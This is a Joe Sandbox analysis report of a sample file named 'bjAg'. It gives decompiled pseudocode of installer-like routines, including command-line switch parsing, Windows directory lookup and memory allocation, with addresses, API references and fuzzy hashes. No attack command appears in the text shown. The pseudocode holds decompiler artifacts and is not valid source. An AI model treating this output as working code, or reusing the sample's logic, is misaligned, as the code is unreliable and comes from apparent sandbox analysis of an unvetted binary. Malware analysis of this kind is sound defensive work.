                                                          				_t10 = __edx;
                                                          				_t17 = __ecx;
                                                          				_t1 = _t17 + 1; // 0x1098b3f
                                                          				_t12 = _t1;
                                                          				do {
                                                          					_t4 =  *_t17;
                                                          					_t17 = _t17 + 1;
                                                          				} while (_t4 != 0);
                                                          				_t18 = _t17 - _t12;
                                                          				_t2 = _t18 + 1; // 0x1098b40
                                                          				if(_t2 < __edx) {
                                                          					_t19 = _t18 + __ecx;
                                                          					if(_t19 > __ecx) {
                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                          						if( *_t8 != 0x5c) {
                                                          							 *_t19 = 0x5c;
                                                          							_t19 =  &(_t19[1]);
                                                          						}
                                                          					}
                                                          					_t6 = _a4;
                                                          					 *_t19 = 0;
                                                          					while( *_t6 == 0x20) {
                                                          						_t6 = _t6 + 1;
                                                          					}
                                                          					return E010916B3(_t16, _t10, _t6);
                                                          				}
                                                          				return 0x8007007a;
                                                          			}












                                                          0x01096592
                                                          0x01096594
                                                          0x01096596
                                                          0x01096598
                                                          0x01096598
                                                          0x0109659b
                                                          0x0109659b
                                                          0x0109659d
                                                          0x0109659e
                                                          0x010965a2
                                                          0x010965a4
                                                          0x010965a9
                                                          0x010965b2
                                                          0x010965b6
                                                          0x010965ba
                                                          0x010965c3
                                                          0x010965c5
                                                          0x010965c8
                                                          0x010965c8
                                                          0x010965c3
                                                          0x010965c9
                                                          0x010965cc
                                                          0x010965d2
                                                          0x010965d1
                                                          0x010965d1
                                                          0x00000000
                                                          0x010965dc
                                                          0x00000000

                                                          APIs
                                                          • CharPrevA.USER32(01098B3E,01098B3F,00000001,01098B3E,-00000003,?,010960EC,01091140,?), ref: 010965BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: 330a1a513532abbd0869a1521d03b90dbb61181f09b02e5956071daae65625eb
                                                          • Instruction ID: 868fad7dd678333c7cc55faa1f60551fff0f562445fcf6ca27c10cfc424d498c
                                                          • Opcode Fuzzy Hash: 330a1a513532abbd0869a1521d03b90dbb61181f09b02e5956071daae65625eb
                                                          • Instruction Fuzzy Hash: 57F042326042509BDB32051D9894BA6BFDD9B86150F18019EE9DEC3249CA674C45E3A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E0109621E() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t5;
                                                          				void* _t9;
                                                          				void* _t13;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				signed int _t21;
                                                          
                                                          				_t5 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t5 ^ _t21;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					0x4f0 = 2;
                                                          					_t9 = E0109597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                          				} else {
                                                          					E010944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                          					 *0x1099124 = E01096285();
                                                          					_t9 = 0;
                                                          				}
                                                          				return E01096CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                          			}











                                                          0x01096229
                                                          0x01096230
                                                          0x01096247
                                                          0x0109626a
                                                          0x01096272
                                                          0x01096249
                                                          0x01096255
                                                          0x0109625f
                                                          0x01096264
                                                          0x01096264
                                                          0x01096284

                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0109623F
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                          • String ID:
                                                          • API String ID: 381621628-0
                                                          • Opcode ID: 746a3c7b41e90359eaf6f92549d1c4c5cf17e8452f1a0403741bb4ff12e834d1
                                                          • Instruction ID: de5f3a78d799711dd92e4e693c420e310aa6a4d20ee31807fbd2ca85bbec772c
                                                          • Opcode Fuzzy Hash: 746a3c7b41e90359eaf6f92549d1c4c5cf17e8452f1a0403741bb4ff12e834d1
                                                          • Instruction Fuzzy Hash: B7F0B4B07002096BEF60EB748D21BFE32A8EB94300F4000AAA9C5D7181ED7699409750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094B60(signed int _a4) {
                                                          				signed int _t9;
                                                          				signed int _t15;
                                                          
                                                          				_t15 = _a4 * 0x18;
                                                          				if( *((intOrPtr*)(_t15 + 0x1098d64)) != 1) {
                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x1098d74)); // executed
                                                          					if(_t9 == 0) {
                                                          						return _t9 | 0xffffffff;
                                                          					}
                                                          					 *((intOrPtr*)(_t15 + 0x1098d60)) = 1;
                                                          					return 0;
                                                          				}
                                                          				 *((intOrPtr*)(_t15 + 0x1098d60)) = 1;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d68)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d70)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d6c)) = 0;
                                                          				return 0;
                                                          			}





                                                          0x01094b66
                                                          0x01094b74
                                                          0x01094b98
                                                          0x01094ba0
                                                          0x00000000
                                                          0x01094bac
                                                          0x01094ba4
                                                          0x00000000
                                                          0x01094ba4
                                                          0x01094b78
                                                          0x01094b7e
                                                          0x01094b84
                                                          0x01094b8a
                                                          0x00000000

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01094FA1,00000000), ref: 01094B98
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 40a143cdf044211cb21b4d03b840898283bbb869788c1f1d431a2c13a6ddc8a7
                                                          • Instruction ID: 9c337b9966dcd9393d862fe66085ffa67e061e7cddbdd81e00c719249ad186b6
                                                          • Opcode Fuzzy Hash: 40a143cdf044211cb21b4d03b840898283bbb869788c1f1d431a2c13a6ddc8a7
                                                          • Instruction Fuzzy Hash: C3F08270501B0DAE4B79AE2DCD6069ABBE6BAD2260310892F91EED2240E7316401DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010966AE(CHAR* __ecx) {
                                                          				unsigned int _t1;
                                                          
                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                          				if(_t1 != 0xffffffff) {
                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}




                                                          0x010966b1
                                                          0x010966ba
                                                          0x010966c7
                                                          0x010966bc
                                                          0x010966be
                                                          0x010966be

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,01094777,?,01094E38,?), ref: 010966B1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 167f646a4ab244b40231b8ddf202c1f0d96b864e6146a1e191d061cdb7e11428
                                                          • Instruction ID: 9019b05112d0538e5755d4f8fd56adad567129595730987d757c9e181b0abaf1
                                                          • Opcode Fuzzy Hash: 167f646a4ab244b40231b8ddf202c1f0d96b864e6146a1e191d061cdb7e11428
                                                          • Instruction Fuzzy Hash: 5AB09276626440826E6106396C395562881B6C123A7E41B90F072C11D4CA3FD456E144
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094CA0(long _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalAlloc(0, _a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x01094caa
                                                          0x01094cb1

                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000000,?), ref: 01094CAA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: e60cc1cf20630202660a65a0257057fa363ae5be11ccdab1a63df5f503e02804
                                                          • Instruction ID: d4570b6a02e36b4c7deec9b11dc91c41b341799160bd4c396877bfef19493207
                                                          • Opcode Fuzzy Hash: e60cc1cf20630202660a65a0257057fa363ae5be11ccdab1a63df5f503e02804
                                                          • Instruction Fuzzy Hash: 3AB0123214420CF7CF101EC6E809F853F1DF7C4761F140000F60C460408A7794208795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094CC0(void* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalFree(_a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x01094cc8
                                                          0x01094ccf

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b48e39273100b54911a4bd00a8309387458354263ff6f5a2f6fb4296d1e4dbf
                                                          • Instruction ID: ff6e54feb67e8d7186717a30eb35674112eac4848a1a91e9dd4b17198937027c
                                                          • Opcode Fuzzy Hash: 2b48e39273100b54911a4bd00a8309387458354263ff6f5a2f6fb4296d1e4dbf
                                                          • Instruction Fuzzy Hash: 7FB0123100010CF78F101A46E8088453F1DE6C03607000010F50C420118B3B98118684
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E01095C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v265;
                                                          				char _v266;
                                                          				char _v267;
                                                          				char _v268;
                                                          				CHAR* _v272;
                                                          				char _v276;
                                                          				signed int _v296;
                                                          				char _v556;
                                                          				signed int _t61;
                                                          				int _t63;
                                                          				char _t67;
                                                          				CHAR* _t69;
                                                          				signed int _t71;
                                                          				void* _t75;
                                                          				char _t79;
                                                          				void* _t83;
                                                          				void* _t85;
                                                          				void* _t87;
                                                          				intOrPtr _t88;
                                                          				void* _t100;
                                                          				intOrPtr _t101;
                                                          				CHAR* _t104;
                                                          				intOrPtr _t105;
                                                          				void* _t111;
                                                          				void* _t115;
                                                          				CHAR* _t118;
                                                          				void* _t119;
                                                          				void* _t127;
                                                          				CHAR* _t129;
                                                          				void* _t132;
                                                          				void* _t142;
                                                          				signed int _t143;
                                                          				CHAR* _t144;
                                                          				void* _t145;
                                                          				void* _t146;
                                                          				void* _t147;
                                                          				void* _t149;
                                                          				char _t155;
                                                          				void* _t157;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				char _t167;
                                                          				char _t170;
                                                          				CHAR* _t173;
                                                          				void* _t177;
                                                          				intOrPtr* _t183;
                                                          				intOrPtr* _t192;
                                                          				CHAR* _t199;
                                                          				void* _t200;
                                                          				CHAR* _t201;
                                                          				void* _t205;
                                                          				void* _t206;
                                                          				int _t209;
                                                          				void* _t210;
                                                          				void* _t212;
                                                          				void* _t213;
                                                          				CHAR* _t218;
                                                          				intOrPtr* _t219;
                                                          				intOrPtr* _t220;
                                                          				signed int _t221;
                                                          				signed int _t223;
                                                          
                                                          				_t173 = __ecx;
                                                          				_t61 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t61 ^ _t221;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_t209 = 1;
                                                          				if(__ecx == 0 ||  *__ecx == 0) {
                                                          					_t63 = 1;
                                                          				} else {
                                                          					L2:
                                                          					while(_t209 != 0) {
                                                          						_t67 =  *_t173;
                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                          							_t173 = CharNextA(_t173);
                                                          							continue;
                                                          						}
                                                          						_v272 = _t173;
                                                          						if(_t67 == 0) {
                                                          							break;
                                                          						} else {
                                                          							_t69 = _v272;
                                                          							_t177 = 0;
                                                          							_t213 = 0;
                                                          							_t163 = 0;
                                                          							_t202 = 1;
                                                          							do {
                                                          								if(_t213 != 0) {
                                                          									if(_t163 != 0) {
                                                          										break;
                                                          									} else {
                                                          										goto L21;
                                                          									}
                                                          								} else {
                                                          									_t69 =  *_t69;
                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                          										break;
                                                          									} else {
                                                          										_t69 = _v272;
                                                          										L21:
                                                          										_t155 =  *_t69;
                                                          										if(_t155 != 0x22) {
                                                          											if(_t202 >= 0x104) {
                                                          												goto L106;
                                                          											} else {
                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                          												_t177 = _t177 + 1;
                                                          												_t202 = _t202 + 1;
                                                          												_t157 = 1;
                                                          												goto L30;
                                                          											}
                                                          										} else {
                                                          											if(_v272[1] == 0x22) {
                                                          												if(_t202 >= 0x104) {
                                                          													L106:
                                                          													_t63 = 0;
                                                          													L125:
                                                          													_pop(_t210);
                                                          													_pop(_t212);
                                                          													_pop(_t162);
                                                          													return E01096CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                          												} else {
                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                          													_t177 = _t177 + 1;
                                                          													_t202 = _t202 + 1;
                                                          													_t157 = 2;
                                                          													goto L30;
                                                          												}
                                                          											} else {
                                                          												_t157 = 1;
                                                          												if(_t213 != 0) {
                                                          													_t163 = 1;
                                                          												} else {
                                                          													_t213 = 1;
                                                          												}
                                                          												goto L30;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L131;
                                                          								L30:
                                                          								_v272 =  &(_v272[_t157]);
                                                          								_t69 = _v272;
                                                          							} while ( *_t69 != 0);
                                                          							if(_t177 >= 0x104) {
                                                          								E01096E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                          								asm("int3");
                                                          								_push(_t221);
                                                          								_t222 = _t223;
                                                          								_t71 =  *0x1098004; // 0x8a9c601
                                                          								_v296 = _t71 ^ _t223;
                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                          									0x4f0 = 2;
                                                          									_t75 = E0109597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                          								} else {
                                                          									E010944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                          									 *0x1099124 = E01096285();
                                                          									_t75 = 0;
                                                          								}
                                                          								return E01096CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                          							} else {
                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                          								if(_t213 == 0) {
                                                          									if(_t163 != 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										goto L40;
                                                          									}
                                                          								} else {
                                                          									if(_t163 != 0) {
                                                          										L40:
                                                          										_t79 = _v268;
                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                          											if(_t83 == 0) {
                                                          												_t202 = 0x521;
                                                          												E010944B9(0, 0x521, 0x1091140, 0, 0x40, 0);
                                                          												_t85 =  *0x1098588; // 0x0
                                                          												if(_t85 != 0) {
                                                          													CloseHandle(_t85);
                                                          												}
                                                          												ExitProcess(0);
                                                          											}
                                                          											_t87 = _t83 - 4;
                                                          											if(_t87 == 0) {
                                                          												if(_v266 != 0) {
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t215 =  &_v268 + _t167;
                                                          														_t183 =  &_v268 + _t167;
                                                          														_t50 = _t183 + 1; // 0x1
                                                          														_t202 = _t50;
                                                          														do {
                                                          															_t88 =  *_t183;
                                                          															_t183 = _t183 + 1;
                                                          														} while (_t88 != 0);
                                                          														if(_t183 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t205 = 0x5b;
                                                          															if(E0109667F(_t215, _t205) == 0) {
                                                          																L115:
                                                          																_t206 = 0x5d;
                                                          																if(E0109667F(_t215, _t206) == 0) {
                                                          																	L117:
                                                          																	_t202 =  &_v276;
                                                          																	_v276 = _t167;
                                                          																	if(E01095C17(_t215,  &_v276) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		_t202 = 0x104;
                                                          																		E01091680(0x1098c42, 0x104, _v276 + _t167 +  &_v268);
                                                          																	}
                                                          																} else {
                                                          																	_t202 = 0x5b;
                                                          																	if(E0109667F(_t215, _t202) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		goto L117;
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																_t202 = 0x5d;
                                                          																if(E0109667F(_t215, _t202) == 0) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	goto L115;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													 *0x1098a24 = 1;
                                                          												}
                                                          												goto L50;
                                                          											} else {
                                                          												_t100 = _t87 - 1;
                                                          												if(_t100 == 0) {
                                                          													L98:
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t217 =  &_v268 + _t170;
                                                          														_t192 =  &_v268 + _t170;
                                                          														_t38 = _t192 + 1; // 0x1
                                                          														_t202 = _t38;
                                                          														do {
                                                          															_t101 =  *_t192;
                                                          															_t192 = _t192 + 1;
                                                          														} while (_t101 != 0);
                                                          														if(_t192 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t202 =  &_v276;
                                                          															_v276 = _t170;
                                                          															if(E01095C17(_t217,  &_v276) == 0) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t104 = CharUpperA(_v267);
                                                          																_t218 = 0x1098b3e;
                                                          																_t105 = _v276;
                                                          																if(_t104 != 0x54) {
                                                          																	_t218 = 0x1098a3a;
                                                          																}
                                                          																E01091680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                          																_t202 = 0x104;
                                                          																E0109658A(_t218, 0x104, 0x1091140);
                                                          																if(E010931E0(_t218) != 0) {
                                                          																	goto L50;
                                                          																} else {
                                                          																	goto L106;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													_t111 = _t100 - 0xa;
                                                          													if(_t111 == 0) {
                                                          														if(_v266 != 0) {
                                                          															if(_v266 != 0x3a) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t199 = _v265;
                                                          																if(_t199 != 0) {
                                                          																	_t219 =  &_v265;
                                                          																	do {
                                                          																		_t219 = _t219 + 1;
                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                          																		if(_t115 == 0) {
                                                          																			 *0x1098a2c = 1;
                                                          																		} else {
                                                          																			_t200 = 2;
                                                          																			_t119 = _t115 - _t200;
                                                          																			if(_t119 == 0) {
                                                          																				 *0x1098a30 = 1;
                                                          																			} else {
                                                          																				if(_t119 == 0xf) {
                                                          																					 *0x1098a34 = 1;
                                                          																				} else {
                                                          																					_t209 = 0;
                                                          																				}
                                                          																			}
                                                          																		}
                                                          																		_t118 =  *_t219;
                                                          																		_t199 = _t118;
                                                          																	} while (_t118 != 0);
                                                          																}
                                                          															}
                                                          														} else {
                                                          															 *0x1098a2c = 1;
                                                          														}
                                                          														goto L50;
                                                          													} else {
                                                          														_t127 = _t111 - 3;
                                                          														if(_t127 == 0) {
                                                          															if(_v266 != 0) {
                                                          																if(_v266 != 0x3a) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	_t129 = CharUpperA(_v265);
                                                          																	if(_t129 == 0x31) {
                                                          																		goto L76;
                                                          																	} else {
                                                          																		if(_t129 == 0x41) {
                                                          																			goto L83;
                                                          																		} else {
                                                          																			if(_t129 == 0x55) {
                                                          																				goto L76;
                                                          																			} else {
                                                          																				goto L49;
                                                          																			}
                                                          																		}
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																L76:
                                                          																_push(2);
                                                          																_pop(1);
                                                          																L83:
                                                          																 *0x1098a38 = 1;
                                                          															}
                                                          															goto L50;
                                                          														} else {
                                                          															_t132 = _t127 - 1;
                                                          															if(_t132 == 0) {
                                                          																if(_v266 != 0) {
                                                          																	if(_v266 != 0x3a) {
                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                          																			goto L49;
                                                          																		}
                                                          																	} else {
                                                          																		_t201 = _v265;
                                                          																		 *0x1099a2c = 1;
                                                          																		if(_t201 != 0) {
                                                          																			_t220 =  &_v265;
                                                          																			do {
                                                          																				_t220 = _t220 + 1;
                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                          																				if(_t142 == 0) {
                                                          																					_t143 = 2;
                                                          																					 *0x1099a2c =  *0x1099a2c | _t143;
                                                          																					goto L70;
                                                          																				} else {
                                                          																					_t145 = _t142 - 3;
                                                          																					if(_t145 == 0) {
                                                          																						 *0x1098d48 =  *0x1098d48 | 0x00000040;
                                                          																					} else {
                                                          																						_t146 = _t145 - 5;
                                                          																						if(_t146 == 0) {
                                                          																							 *0x1099a2c =  *0x1099a2c & 0xfffffffd;
                                                          																							goto L70;
                                                          																						} else {
                                                          																							_t147 = _t146 - 5;
                                                          																							if(_t147 == 0) {
                                                          																								 *0x1099a2c =  *0x1099a2c & 0xfffffffe;
                                                          																								goto L70;
                                                          																							} else {
                                                          																								_t149 = _t147;
                                                          																								if(_t149 == 0) {
                                                          																									 *0x1098d48 =  *0x1098d48 | 0x00000080;
                                                          																								} else {
                                                          																									if(_t149 == 3) {
                                                          																										 *0x1099a2c =  *0x1099a2c | 0x00000004;
                                                          																										L70:
                                                          																										 *0x1098a28 = 1;
                                                          																									} else {
                                                          																										_t209 = 0;
                                                          																									}
                                                          																								}
                                                          																							}
                                                          																						}
                                                          																					}
                                                          																				}
                                                          																				_t144 =  *_t220;
                                                          																				_t201 = _t144;
                                                          																			} while (_t144 != 0);
                                                          																		}
                                                          																	}
                                                          																} else {
                                                          																	 *0x1099a2c = 3;
                                                          																	 *0x1098a28 = 1;
                                                          																}
                                                          																goto L50;
                                                          															} else {
                                                          																if(_t132 == 0) {
                                                          																	goto L98;
                                                          																} else {
                                                          																	L49:
                                                          																	_t209 = 0;
                                                          																	L50:
                                                          																	_t173 = _v272;
                                                          																	if( *_t173 != 0) {
                                                          																		goto L2;
                                                          																	} else {
                                                          																		break;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										} else {
                                                          											goto L106;
                                                          										}
                                                          									} else {
                                                          										L34:
                                                          										_t209 = 0;
                                                          										break;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L131;
                                                          					}
                                                          					if( *0x1098a2c != 0 &&  *0x1098b3e == 0) {
                                                          						if(GetModuleFileNameA( *0x1099a3c, 0x1098b3e, 0x104) == 0) {
                                                          							_t209 = 0;
                                                          						} else {
                                                          							_t202 = 0x5c;
                                                          							 *((char*)(E010966C8(0x1098b3e, _t202) + 1)) = 0;
                                                          						}
                                                          					}
                                                          					_t63 = _t209;
                                                          				}
                                                          				L131:
                                                          			}


































































                                                          0x01095c9e
                                                          0x01095ca9
                                                          0x01095cb0
                                                          0x01095cb3
                                                          0x01095cb6
                                                          0x01095cb7
                                                          0x01095cb8
                                                          0x01095cbd
                                                          0x01096204
                                                          0x01095ccb
                                                          0x00000000
                                                          0x01095ccb
                                                          0x01095cd3
                                                          0x01095cd7
                                                          0x01095cf4
                                                          0x00000000
                                                          0x01095cf4
                                                          0x01095cf8
                                                          0x01095d00
                                                          0x00000000
                                                          0x01095d06
                                                          0x01095d06
                                                          0x01095d0e
                                                          0x01095d10
                                                          0x01095d12
                                                          0x01095d14
                                                          0x01095d15
                                                          0x01095d17
                                                          0x01095d49
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095d19
                                                          0x01095d19
                                                          0x01095d1d
                                                          0x00000000
                                                          0x01095d3f
                                                          0x01095d3f
                                                          0x01095d4b
                                                          0x01095d4b
                                                          0x01095d4f
                                                          0x01095d8d
                                                          0x00000000
                                                          0x01095d93
                                                          0x01095d93
                                                          0x01095d9a
                                                          0x01095d9d
                                                          0x01095d9e
                                                          0x00000000
                                                          0x01095d9e
                                                          0x01095d51
                                                          0x01095d5b
                                                          0x01095d72
                                                          0x010960fb
                                                          0x010960fb
                                                          0x01096207
                                                          0x0109620a
                                                          0x0109620b
                                                          0x0109620e
                                                          0x01096217
                                                          0x01095d78
                                                          0x01095d78
                                                          0x01095d80
                                                          0x01095d83
                                                          0x01095d84
                                                          0x00000000
                                                          0x01095d84
                                                          0x01095d5d
                                                          0x01095d5f
                                                          0x01095d62
                                                          0x01095d68
                                                          0x01095d64
                                                          0x01095d64
                                                          0x01095d64
                                                          0x00000000
                                                          0x01095d62
                                                          0x01095d5b
                                                          0x01095d4f
                                                          0x01095d1d
                                                          0x00000000
                                                          0x01095d9f
                                                          0x01095d9f
                                                          0x01095da5
                                                          0x01095dab
                                                          0x01095dba
                                                          0x01096218
                                                          0x0109621d
                                                          0x01096220
                                                          0x01096221
                                                          0x01096229
                                                          0x01096230
                                                          0x01096247
                                                          0x0109626a
                                                          0x01096272
                                                          0x01096249
                                                          0x01096255
                                                          0x0109625f
                                                          0x01096264
                                                          0x01096264
                                                          0x01096284
                                                          0x01095dc0
                                                          0x01095dc0
                                                          0x01095dca
                                                          0x01095e22
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095dcc
                                                          0x01095dce
